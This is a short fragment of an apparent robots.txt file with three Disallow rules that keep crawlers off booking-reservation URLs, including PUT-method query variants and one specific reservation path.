Disallow: /bookings/slot/reservation/*?*method=put
Disallow: /bookings/slot/reservation/30071103/39929633
Disallow: /bookings/slot/reservation/30071103/39929633/*